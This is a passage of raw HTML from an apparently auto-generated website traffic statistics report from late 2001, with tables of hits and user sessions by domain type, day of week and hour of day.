<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Network</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16930</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1410</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Education</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2774</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">259</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Military</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">871</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.07%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Organization</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">411</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Government</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">396</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Arpanet</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>42040</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7495</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="ActivityStats"><!--Activity Statistics::Summary of Activity for Report Period--></A>
<!-- WT_H1>Summary of Activity for Report Period</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity for Report Period</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section outlines general server activity, comparing the level of activity on weekdays and weekends. The Average Number of Users and Hits on Weekdays are the averages for each individual week day. The Average Number of Users and Hits for Weekends groups Saturday and Sunday together. Values in the table do not include erred hits.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- ---- ---- -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>Summary of Activity for Report Period</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Summary of Activity for Report Period</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> per day on Weekdays</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">129</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> per day on Weekdays</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">805</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> for the entire Weekend</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">208</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> for the entire Weekend</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">945</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day of the Week</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Tue</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day of the Week</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Sat</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day Ever</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 09, 2001</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Most Active Day</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">7019</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day Ever</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 26, 2001</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Least Active Day</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">29</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- ---- ---- -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBandwidth"><!--Activity Statistics::Summary of Activity by Time Increment--></A>
<!-- WT_H1>Summary of Activity by Time Increment</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity by Time Increment</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section helps you understand the bandwidth requirements of the site by indicating the volume of activity in kilobytes transferred. The table provides various measures of activity by unit of time for the report period (the unit of time depends on the amount of time covered by the report, and will be the day in most cases).<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index12.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopWeekdays"><!--Activity Statistics::Activity Level by Day of Week--></A>
<!-- WT_H1>Activity Level by Day of Week</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Day of Week</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the activity for each day of the week for the report period (i.e. if there are two Mondays in the report period, the value presented is the sum of all hits for both Mondays.) Values in the table do not include erred hits. <!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index13.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Activity Level by Day of the Week</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Day of Week</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Day</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sun</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7303</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1546</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9156</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1536</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Tue</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16119</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2275</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Wed</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11077</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1610</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Thu</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1385</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Fri</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7355</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1382</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sat</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4983</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.9%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1164</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekdays</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>50740</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>80.5%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>8188</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekend</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>12286</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>19.49%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>2710</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopHours"><!--Activity Statistics::Activity Level by Hour--></A>
<!-- WT_H1>Activity Level by Hour of the Day</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Hour of the Day</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the most and the least active hour of the day for the report period. The second table breaks down activity for the given report period to show the average activity for each individual hour of the day (if there are several days in the report period, the value presented is the sum of all hits during that period of time for all days). All times are referenced to the location of the system running the analysis.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index14.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>Activity Level by Hour of the Day</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Most Active Hour of the Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">18:00-18:59</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Least Active Hour of the Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">05:00-05:59</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 3, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Activity Level by Hours Details</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hour</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>00:00-00:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1789</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">378</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>01:00-01:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1580</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">316</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>02:00-02:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1400</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">270</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>03:00-03:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">848</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.34%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>04:00-04:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">882</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>05:00-05:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">765</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">211</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>06:00-06:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1029</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">264</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>07:00-07:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1697</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">267</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>08:00-08:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">322</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>09:00-09:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3074</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">479</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10:00-10:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3268</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">426</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11:00-11:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3310</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.25%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">485</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>12:00-12:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3625</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">545</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>13:00-13:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4329</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.86%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">514</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14:00-14:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3921</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15:00-15:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3579</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">524</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>16:00-16:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2891</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">540</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>17:00-17:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3256</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18:00-18:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4450</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">713</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19:00-19:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3466</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.49%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">689</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20:00-20:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">666</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>21:00-21:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3554</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">717</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>22:00-22:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2688</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.26%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">538</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>23:00-23:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2257</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">425</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Users during Work Hours (8:00am-5:00pm)</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>30181</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>47.88%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4433</B></TD>
</TR>
